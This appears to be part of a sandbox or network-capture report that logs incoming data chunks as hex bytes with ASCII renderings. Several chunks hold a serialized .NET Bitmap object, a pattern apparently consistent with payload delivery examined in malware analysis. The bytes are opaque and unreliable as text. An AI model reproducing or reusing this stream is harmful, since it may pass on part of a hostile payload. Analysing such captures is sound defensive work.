2021-10-16 14:53:40 UTC	5953	IN	Data Raw: ba 42 c1 26 8f cd 38 4b 1e 7d 83 c0 89 a3 f3 00 89 13 f3 67 3f 62 f9 aa 3b fa 2c 74 ad 05 08 1f d1 96 02 1e 56 f5 09 b1 b9 4b f9 5b 69 af 27 ee 61 ab 50 96 b1 48 a6 fb 02 eb 57 a6 d3 15 3a 33 26 37 dc 3a c3 91 75 8c 08 ed 89 3b 42 20 a9 4c f8 f4 d6 ee 03 97 90 51 87 e5 0a cd 28 00 48 75 e8 bc af 67 04 7d 1e cc 86 12 ac c6 de 9e a2 89 b6 03 92 ff d9 e9 95 7b f9 ae b4 9d 54 ef 5a 99 d3 46 ae c9 15 50 31 50 8b 76 7b 77 c6 7c a5 31 c8 47 e6 7b 25 84 3b 34 70 01 d9 94 01 64 3d 1a 7d f4 3c b1 81 02 92 78 3d 62 bf de e7 27 e8 ef 8d 05 81 6a 2a d7 c9 4d f3 32 43 6c 54 88 ab 49 d0 0f 16 57 2c c4 66 06 1b 9a 6c 10 0c 32 c5 74 59 c5 92 5d ea 23 8a 64 3c f5 0a 2e 06 f6 bd e2 91 bd 7b 36 cb 1b 31 ee 4c 13 73 f2 9b 7e e5 b7 15 16 4b eb 27 3a ad c5 d2 4b 1d 35 fc bd d7 Data Ascii: B&8K}g?b;,tVK[i'aPHW:3&7:u;B LQ(Hug}{TZFP1Pv{w\|1G{%;4pd=}<x=b'j*M2ClTIW,fl2tY]#d<.{61Ls~K':K5
2021-10-16 14:53:40 UTC	5969	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 da 01 02 fc b0 4c b3 30 2f bb 88 a2 de 36 86 62 e3 7f 0b ed 03 ff ee 1b 9e 31 f2 0e 33 c3 35 3e 7e ad 10 d9 70 62 d5 df 82 98 9b a8 55 1c 59 80 0c 32 5e ac 49 3d d0 0f b8 93 04 a7 65 4f c2 4e 16 72 ba 6b 02 36 8e 70 25 c0 f4 26 0c 84 a2 ac f1 8c 30 55 bf 98 cd 51 94 f0 b0 cf a9 b8 53 36 76 88 6f b3 55 2f 7a c5 51 82 1d 1f de 00 2d fa 01 7e f8 20 c9 0f b7 b2 63 dd 77 36 01 95 a4 9f dc 95 cc 82 fb 0d 8c 4e 45 2c 4f f0 58 39 34 6f 18 4c 86 65 f8 81 43 74 af 06 f0 99 57 8b 40 c3 ca 1f 9b 5a 92 1b 11 80 fb aa 79 2e a4 ff 75 5b 79 Data Ascii: L0/6b135>~pbUY2^I=eONrk6p%&0UQS6voU/zQ-~ cw6NE,OX94oLeCtW@Zy.u[y
2021-10-16 14:53:40 UTC	5985	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	6001	IN	Data Raw: 30 06 b0 78 b2 fd eb 4e 09 57 1f 82 8b 72 3b dd cf 57 30 0c 0a c8 f1 6b 04 fe 9b 49 0d e0 2f 9c 6a 54 b1 5a 49 f8 53 1b 71 4b f6 fd d6 3d b4 1d cc fc 28 bf 44 84 66 ab 8f 04 35 8d 4a be 72 91 94 35 5e e8 08 51 42 69 fc 08 8b 12 f0 89 83 f4 9b 1b ea ce 23 08 0c 25 0d 9a 3d 8f 43 eb 66 24 3c de a4 8b 58 2a 09 e9 a3 77 7f 43 0a ed c0 38 33 b8 10 6b e6 3e 8e 25 7d 95 0d 53 04 29 e8 d0 a4 74 c7 d8 d7 c0 9f 8a f6 98 4e cd 76 6a 90 21 7d c4 d4 9d 9a ee 2a 6f 28 4a 4b 92 bc 93 70 0a 83 5e b3 d3 23 8a 43 c3 dd e9 53 61 ed 1c e0 e5 be 4e 52 56 ed b4 02 fd f2 3d 89 4b ac 90 e4 34 65 84 1b 0f 9d b4 5a 8e 1d 23 ad 7e ca 62 d0 60 59 7e a8 1a ad aa ca 1b 1e ce 7e d0 4e b2 cc d6 c5 f0 0c 70 09 13 d0 3d 42 e1 b9 50 38 fa 42 7e 08 ef e8 4b f7 03 43 77 b6 d3 2a 0c d4 c6 8b Data Ascii: 0xNWr;W0kI/jTZISqK=(Df5Jr5^QBi#%=Cf$<XwC83k>%}S)tNvj!}o(JKp^#CSaNRV=K4eZ#~b`Y~~Np=BP8B~KCw*
2021-10-16 14:53:40 UTC	6017	IN	Data Raw: 57 61 65 80 a4 a5 22 f4 46 e3 a4 e6 77 ad e6 45 23 b0 b4 18 37 17 9c 39 13 ae a9 8f 5d 60 47 6c ee 03 86 85 5a b4 d2 67 ea 02 e8 af eb 54 d6 6d 37 38 25 2d 47 8b 8c 8e 98 74 2d 8e 93 ee e4 78 d2 f5 9e 5f bc a0 5e d8 a1 af 66 8d aa 53 46 f6 92 fc 53 d0 f5 0b 2d bf 33 ee 98 35 8e 9a fe 6c ab d3 fa 24 59 02 a0 46 f8 06 c4 5d 83 54 03 7a ad 9c ea 7c a2 35 07 9c 35 29 b0 11 c9 e2 95 fe b9 d6 5e 72 59 03 2e 7e 03 e5 05 dc f7 44 22 5c 4e 9a ec 72 a2 27 10 4b 6b eb 72 43 75 d3 03 29 7f 77 5f 4c 6e 6c c4 b3 9c 20 ed 1d b8 1d 08 c6 6c d2 13 b5 66 d1 59 f1 93 44 44 f2 c1 ef 73 6b 02 1a 2d 58 9e eb e1 50 a3 17 1b 4e 97 6c a7 8f f9 e6 8e 26 7b 66 3a 15 cf fa da 54 c8 3a 02 c7 16 9a 34 66 c4 00 91 c7 b4 b8 fc f7 f2 b4 65 cf c3 a0 72 56 06 dd af 0f 61 bd 6e e8 67 ab 0b Data Ascii: Wae"FwE#79]`GlZgTm78%-Gt-x_^fSFS-35l$YF]Tz\|55)^rY.~D"\Nr'KkrCu)w_Lnl lfYDDsk-XPNl&{f:T:4ferVang
2021-10-16 14:53:40 UTC	6033	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	6049	IN	Data Raw: 0f 1a e9 41 92 2e 2c 5c 8f f8 74 70 1b b8 58 87 f9 69 bf 6a 32 84 01 47 bb a7 fc 08 23 b3 9c 20 8d d5 d7 01 1c 11 22 3e 49 24 d5 2d ac 36 fe b9 82 96 7a d6 ff 1e 87 57 f1 a1 e7 57 ae 4b 7a c4 a0 a8 f2 bd 10 1e bd 7a 2f 24 43 48 71 29 34 19 9b 06 73 e1 41 ac 05 11 60 61 2d e2 e8 c2 13 59 e8 6f ff 29 ce 8e b4 00 24 60 2e ba f5 0b 56 45 e8 96 68 d3 02 29 0a 2f 9a 41 23 2c 89 ec 4a 7e c0 2f bf 2c a1 61 47 d7 97 05 5d d9 94 05 3f f7 72 e6 d5 de 7a 00 47 d1 6c 55 84 e9 f0 70 91 b7 42 f7 e0 bc 2b 25 c3 85 11 ab 36 a1 88 62 b9 17 20 fe 3a 0d 0f 00 00 00 00 2a db e3 6f 23 80 ae 7b 97 d8 c4 a4 a6 e6 d3 ba 28 98 ab aa 37 8b f0 7a a9 62 0b fc 42 e6 e2 04 0a 8e bb 46 a1 d9 e7 3e 02 89 d2 ba e8 46 2d 8b 57 c9 b7 ea 03 52 82 06 ea af 41 36 97 ad 6d 70 3f d3 ff 10 90 78 Data Ascii: A.,\tpXij2G# ">I$-6zWWKzz/$CHq)4sA`a-Yo)$`.VEh)/A#,J~/,aG]?rzGlUpB+%6b :*o#{(7zbBF>F-WRA6mp?x
2021-10-16 14:53:40 UTC	6065	IN	Data Raw: c6 20 9d d5 c7 e6 ff b2 a4 05 ca 1e bc 1a df 7f 55 ea 83 69 a2 b2 78 63 e7 4f 32 05 3e 8f 46 26 d0 c2 05 cc 28 82 c1 a2 af af 1f 69 25 50 88 ea 86 8d 4e 69 41 d4 d7 22 79 ff d3 8f c4 5d 77 00 03 a8 5b 69 61 d6 03 13 a0 1f 3d 17 ee 4d b7 57 65 ae 0e 65 16 2d 99 0e 28 7d 0a 24 cc 92 61 93 ed 4f b9 34 da 0a b1 43 4a fd 3c f7 fa 77 dc 63 94 bf 6c b5 fe 43 31 89 3f de 8f 5d 5b 24 91 6b b1 5d d3 00 fd 2b bb f4 66 f9 1f e8 fe a6 82 c6 13 6d 5b 1d 79 6f 20 f8 13 b7 e0 99 12 31 62 0f 8b 50 32 a1 ea 00 bf d5 70 02 1a 5e fa 77 56 73 ac be ec 84 61 57 0b e6 f2 74 55 05 00 44 63 af ac 22 92 a3 14 da f5 0e c4 3b eb 6b 33 75 b6 00 fd 95 e8 17 2b 8e f2 32 3e 7d 06 43 98 38 b3 79 f8 f8 a6 96 ca b7 c9 ff 60 d0 91 88 a6 fa 25 df 11 da 00 ee d2 86 c8 53 f7 fd bc 26 34 c5 d8 Data Ascii: UixcO2>F&(i%PNiA"y]w[ia=MWee-(}$aO4CJ<wclC1?][$k]+fm[yo 1bP2p^wVsaWtUDc";k3u+2>}C8y`%S&4
2021-10-16 14:53:40 UTC	6081	IN	Data Raw: de e3 cb 3c 5a ca 47 fc 0c e2 03 c8 05 b6 61 0b 22 9b fd 99 87 e5 a2 63 07 3d 39 86 a9 79 5c d6 66 cd 32 6d 3b b3 00 e9 0a cd 0b b4 80 55 95 da 9e 99 17 66 73 01 c8 07 05 19 4c 73 29 20 5e 3e e5 fc e7 d6 37 14 51 42 2e 38 fc 58 be e1 ab 27 63 cf f4 40 18 c1 2e 7c 87 d0 e9 b9 9f 2d 48 89 25 88 24 bd a5 0c 90 c5 51 f1 9a 28 35 4b 83 f1 88 c3 fa dd 07 f8 99 f0 53 37 f0 ea fa 53 16 6b 31 c0 26 8d 43 69 c2 3a 6b a7 5b fa a5 f9 72 1d a7 37 1b 63 1f d7 bd 54 05 27 13 6c b4 a7 07 30 0b 7b 14 fe 83 f5 96 ab 1d 0a fc 0b 3e 73 5d c8 bc 8a e5 d2 f6 2c 64 a6 0e 5b 35 a4 b3 bc 29 ca 6e d4 5d ff 17 ab a6 90 2d 98 88 3c 1f cd fd 28 c2 ab 42 cb af d6 1a e3 7e d7 f8 98 6e 2a 0d 7f 2e 35 e1 e1 32 69 d8 b7 7a 52 7c 93 73 b5 49 77 8d 28 e1 b7 30 5c 6d c0 8b c2 e9 7c 9d 67 20 Data Ascii: <ZGa"c=9y\f2m;UfsLs) ^>7QB.8X'c@.\|-H%$Q(5KS7Sk1&Ci:k[r7cT'l0{>s],d[5)n]-<(B~n*.52izR\|sIw(0\m\|g
2021-10-16 14:53:40 UTC	6097	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	6113	IN	Data Raw: 9c dd 38 8c 69 1c 97 ce 1d 15 be fd 03 cf 00 fc 61 fe 18 f5 8f 28 57 3e 31 fb 27 44 38 52 94 48 31 59 9d a4 65 93 56 e5 03 f2 84 6a 2b bd f5 f3 80 6a c4 2d f2 9c 46 d5 08 59 b5 1e 63 c1 4c c2 d1 b8 6c d2 a5 34 a9 06 1c 7c db 1a 1a 58 4e 05 00 9f dc 7d f2 a9 2e e9 97 ca eb 34 f2 b2 74 7e 14 b5 45 f8 82 f6 b4 c5 66 5a a3 c0 90 14 fb c1 64 5c 5f e0 ac 65 24 c2 73 f2 30 f6 2c 91 f9 4e 6c 7a ed 1a b3 2c 76 54 f0 0a e9 3a 22 43 10 8b 24 48 b5 a0 76 27 65 0f f9 0d cc f5 d5 4f 8c 3e 84 ba 76 97 f1 e6 f4 54 67 f8 70 24 63 be 1c 71 3a 2f 72 c0 35 27 66 72 0f 31 30 a2 5e 95 f7 70 4a 82 b1 84 50 1f 2f e2 15 4f 06 6d cc 71 8d 4f 76 75 8a 69 2d f9 d0 1e de dd 19 9b 2d 82 0c a1 e4 ee 60 e6 28 e2 c0 2c 66 28 22 2c 65 ca d1 08 5e ec 7a f2 6e 24 b6 33 e0 09 c5 ea 5b c4 65 Data Ascii: 8ia(W>1'D8RH1YeVj+j-FYcLl4\|XN}.4t~EfZd\_e$s0,Nlz,vT:"C$Hv'eO>vTgp$cq:/r5'fr10^pJP/OmqOvui--`(,f(",e^zn$3[e
2021-10-16 14:53:40 UTC	6129	IN	Data Raw: 8e 99 ff 93 23 83 06 18 7a b4 c6 88 09 04 89 75 83 9a bc 3f 52 44 ef 97 80 b1 51 98 dc 4f 46 56 0a 64 1e 45 29 50 9f f2 50 03 13 d7 0a fb 3b c3 cd a7 82 97 ea 1c 6f d5 e9 ed 03 6a 2c 1f e7 da 5a c3 9c 00 2b d2 fc 33 a2 32 47 92 5e e7 43 81 73 2f 69 8e ca ac 48 e1 b7 be d5 0c b6 a9 8d 57 d1 cd e2 d2 49 b9 7b 5d 13 ca 6d 3d dd 2b 56 04 5c b5 f0 87 c7 a0 bc e1 0e 73 ef e4 60 63 4f cd dc 70 70 84 92 1c fa 6e e1 af 4e d6 5c 91 18 64 cc 34 fe ce 75 03 aa 95 67 21 c9 30 94 df 55 73 7d 80 48 32 21 45 e3 e3 dd 02 be 80 26 2d 2c 5a d3 8a 41 34 2e 92 45 a0 d7 32 26 fd 66 a1 e9 1d 71 35 56 a7 35 9c 1e 1d a4 80 f4 f7 ee 3c 78 ee 5e 13 be 89 44 86 9c 60 4d b6 81 03 6c d8 28 a8 a4 34 d7 ea 00 3d df 28 f1 78 1a 86 23 a6 37 45 57 55 4c 93 9f da b4 dd a5 61 53 9a 1e 8a 76 Data Ascii: #zu?RDQOFVdE)PP;oj,Z+32G^Cs/iHWI{]m=+V\s`cOppnN\d4ug!0Us}H2!E&-,ZA4.E2&fq5V5<x^D`Ml(4=(x#7EWULaSv
2021-10-16 14:53:40 UTC	6145	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	6161	IN	Data Raw: 1a f7 1d 07 ef f1 4a 33 07 ce a8 ce 00 ba 13 30 3e 9b c3 b1 4e a8 d7 ee 06 b8 9d e8 ea b7 1f 1f e8 d1 dd 87 34 22 8e 0e c1 a1 00 07 70 0b a9 f5 5e f0 20 cd 94 4a be 7b 64 81 4d 39 b5 2f f1 65 8d b0 3b d8 ca 05 0d 1f 34 ae 79 18 2b 26 b5 2c 2e 2d 54 ba e4 90 5a b6 66 e1 4c 38 21 69 39 9d 7a 63 0b 40 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 51 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 30 33 66 35 66 37 66 31 31 64 35 30 61 33 61 05 01 00 00 00 15 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2e 42 69 74 6d 61 70 01 00 00 00 04 44 61 74 61 07 02 02 00 00 00 09 03 00 00 00 0f 03 00 00 Data Ascii: J30>N4"p^ J{dM9/e;4y+&,.-TZfL8!i9zc@QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aSystem.Drawing.BitmapData
2021-10-16 14:53:40 UTC	6177	IN	Data Raw: 3c c1 09 ae bf 7e d4 d9 c6 f7 e0 93 d8 79 3d 98 02 8b ef 97 7b 49 09 86 b6 7a f3 ad 0d d1 49 c9 9e 76 89 a4 01 62 85 ba dc 34 ba 21 ac 91 5f 3c 15 0f c7 33 14 c4 a0 64 59 de ba 74 20 09 c2 18 7b 26 e8 8e 55 1a 03 56 3b 70 dc e9 57 0d db 24 2d 19 87 51 fc fe ba e9 4c 6a a5 fd 75 62 c5 70 c0 cb b1 1a ed f0 38 07 58 a1 88 c4 d5 22 5a d2 af ee fe 3f 95 f4 96 fe 62 73 1a e6 0e 63 fe 25 24 47 b3 4e 9b 73 0f ff ab a1 c4 be 20 03 39 76 d5 d7 27 f2 20 9c 1a f2 4c a1 89 eb 71 f7 97 40 3e 31 23 18 d9 43 96 49 29 b2 0f 00 9b 0d d2 65 75 87 ae b3 29 61 6a c1 00 b7 c9 5f 5a 06 c2 09 85 90 96 ec af 91 87 9b fd 30 e4 ab 30 ba 46 f1 66 32 f6 fe cd 9f c9 b7 07 39 3b 53 78 3b c0 d6 0e e1 30 60 4f 46 6b a7 f9 61 d1 15 54 56 d7 a1 6e 5b 0b 3d a2 48 ae 34 d0 9d a8 04 57 0d e5 Data Ascii: <~y={IzIvb4!_<3dYt {&UV;pW$-QLjubp8X"Z?bsc%$GNs 9v' Lq@>1#CI)eu)aj_Z00Ff29;Sx;0`OFkaTVn[=H4W
2021-10-16 14:53:40 UTC	6193	IN	Data Raw: c3 46 5b c5 50 2e 61 7a f5 50 5b 08 df f0 85 60 ca c7 bc fb 6e bd 1c b6 c6 0e bf 2c c9 3f aa 47 80 9c 5f 69 db cd 01 09 54 b2 09 a2 93 e5 73 d4 3f 25 9f 24 79 25 d5 3e 24 b9 3b b6 5b 70 ec f4 07 f9 c0 9c 97 3a 9d f6 37 96 d9 5b 3b 0f ce eb ec c2 f1 ab 09 9d bf 2e 7d 74 77 71 8c 8d 43 78 93 2a 6a b8 d5 54 20 9a 20 2d 1e fb fa f5 bb 7c c0 a3 97 f5 e8 14 3c 18 4b b5 76 95 9a 91 bc 4c f0 ca 97 e9 20 82 a3 34 fc 67 04 45 e2 92 aa bb 4a d0 f3 d8 0f c1 16 17 d5 82 11 56 8f 63 e4 df 11 1d f8 b7 f7 16 b6 89 38 d3 73 4f 1b 6d 53 d4 a5 01 65 ab 2e 79 c5 4a 55 43 c4 5a 83 f3 23 b4 f5 62 88 27 c3 2f 3c 8b 7e ef a7 e8 dc f6 ae 27 11 35 8b 73 0a f3 c0 01 d9 ae c4 68 b6 63 80 40 81 a0 e6 5b 1e 8d 43 7c 94 98 c8 c9 ce c0 d5 65 b0 1e ac 3e 77 ec da 08 98 fe c2 fc 2e 10 29 Data Ascii: F[P.azP[`n,?G_iTs?%$y%>$;[p:7[;.}twqCx*jT -\|<KvL 4gEJVc8sOmSe.yJUCZ#b'/<~'5shc@[C\|e>w.)
2021-10-16 14:53:40 UTC	6209	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	6225	IN	Data Raw: b1 ea e0 b7 11 ea 80 d8 68 7d 64 36 a1 c8 3d c2 5d 53 f7 1a 97 30 1b 05 36 31 c3 fb 35 57 57 30 a6 ca 84 b7 0e 11 56 57 2b a7 df dd 28 5e f1 e1 b8 fe 0e dc 43 3e 46 1b 2b 74 7c ab 36 e1 74 8e 12 8f b3 51 9b ad 91 0b da ec 9a 6e 9b e5 50 50 e4 36 29 dd a9 ef f1 d5 8a 7d 21 89 bb c4 7d c6 25 09 0d 2f e1 3e b4 0a 6c 64 65 b9 0a 90 d0 ca ac 16 22 e4 41 df 02 9b 9f da 11 1c aa 36 84 38 97 c4 dd 31 06 84 d3 a6 7c 8a c0 ed 52 f5 3d 25 65 00 74 f7 a2 bd 44 43 60 9b 67 a5 3e 92 5d 13 c5 b6 34 8f 61 b0 79 56 94 e9 c6 98 49 1b 08 ce c3 ae ea 68 40 ef 6b 4b f4 dd f2 e0 6d 86 6e e0 37 fb 1e f7 5c 58 87 15 51 52 1e 61 89 4f 9d eb dd bc f0 8a 25 23 8d 5d ac bc 24 7e 6c e9 35 26 eb ec 93 ad 49 00 9e 2a a8 0b 9e 47 9e 3a c2 af ba 18 8a 38 d6 3a 04 88 27 9b 4e ca 09 71 5e Data Ascii: h}d6=]S0615WW0VW+(^C>F+t\|6tQnPP6)}!}%/>lde"A681\|R=%etDC`g>]4ayVIh@kKmn7\XQRaO%#]$~l5&I*G:8:'Nq^
2021-10-16 14:53:40 UTC	6241	IN	Data Raw: 02 08 d9 e0 fd 4e 6a a7 96 8f c0 81 65 cf 97 3c e3 2b 32 93 7b 96 30 7f 9e f8 bd 55 2a 6d 9c 5c 74 cf 88 6b ea ed 46 9b 82 34 18 e6 14 ae a2 4b f6 fc 7f fd 00 83 df 22 86 d8 48 47 35 55 7a 2d e6 50 0a 5d 23 43 10 42 52 cc 01 a6 9f f7 68 8b 42 12 48 24 08 8d a2 e0 ec 52 61 78 16 f8 e2 5f 13 29 ee 16 02 f0 2a 52 56 77 f5 e6 92 17 d3 58 e0 8e 6d c8 3e eb c3 ca 52 ed f9 03 2d bb a4 e5 29 7c 0a f8 32 cb bb 6c 13 8c 6f 65 90 bb 29 6d 6b e0 9e 1d 12 68 f6 c2 cd e2 42 d2 f4 c0 06 fb b8 76 05 f5 94 b1 61 52 98 2b 9d 42 4e f5 8b 70 b6 04 cc 7f 71 7d ab f0 06 b9 c4 68 4d 45 31 ea 4d b8 72 61 8e e4 82 b6 5f f2 b9 85 bd 32 fe f3 92 d2 2a bb ab 72 f1 bd 83 f8 c7 f5 10 a4 e4 bb 96 ae 3d eb 13 ca 06 fb de 8f 7b 70 cd 32 c0 11 36 18 36 01 fe 03 a7 83 cc 65 a1 b2 01 65 a3 Data Ascii: Nje<+2{0Um\tkF4K"HG5Uz-P]#CBRhBH$Rax_)RVwXm>R-)\|2loe)mkhBvaR+BNpq}hME1Mra_2*r={p266ee
2021-10-16 14:53:40 UTC	6257	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	6273	IN	Data Raw: 74 65 6d 2e 44 72 61 77 69 6e 67 2e 42 69 74 6d 61 70 01 00 00 00 04 44 61 74 61 07 02 02 00 00 00 09 03 00 00 00 0f 03 00 00 00 e6 16 00 00 02 42 4d e6 16 00 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 00 00 00 2c 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 c4 0e 00 00 c4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: tem.Drawing.BitmapDataBM6(,,
2021-10-16 14:53:40 UTC	6289	IN	Data Raw: 20 e8 da e3 49 71 0a 91 a1 d7 eb f8 e8 0c 6b 6e 7b 70 6c c9 fb 51 97 4e 5d 1d 58 14 32 be 16 18 82 85 3d f8 ef 5d 18 e2 8b 2e 49 26 a5 1b c8 c1 79 21 75 66 be 4c 48 0a 84 f5 0e 83 cc 2e 7a 3b a1 75 80 a8 86 d0 63 55 52 ed 0c 10 16 4f df ac f6 a2 9c 07 fd ad a4 11 73 be 13 f7 3b 46 3c 28 fa 91 d0 d7 e3 71 a3 3c 88 b1 f0 d5 82 0c f0 dd 7a 9f 7b cd db 49 3b 9f 19 50 3d d7 fa 45 c9 0c fd 9b 58 14 cc 71 03 4b c6 ef 63 2c d4 11 df 01 4e 75 d8 98 61 ae b6 cd 47 4f 92 15 4c 1c c6 2e 9f 99 da b2 91 2f 6e 30 52 ae 69 81 71 ac a0 83 9d c7 0e 04 5c 61 99 cd 43 38 49 bc 99 cf 52 25 dc ba 10 d2 36 e3 11 68 81 38 b5 b5 1f 66 56 41 d8 c2 ac 34 bd 16 cb 5e 9f d9 59 e4 de b1 95 45 00 e4 44 f1 b0 7f a2 55 6c a9 ed db c5 2e b6 bf 6b 75 99 96 f4 5e 26 29 34 e3 bf 1f e8 c6 de Data Ascii: 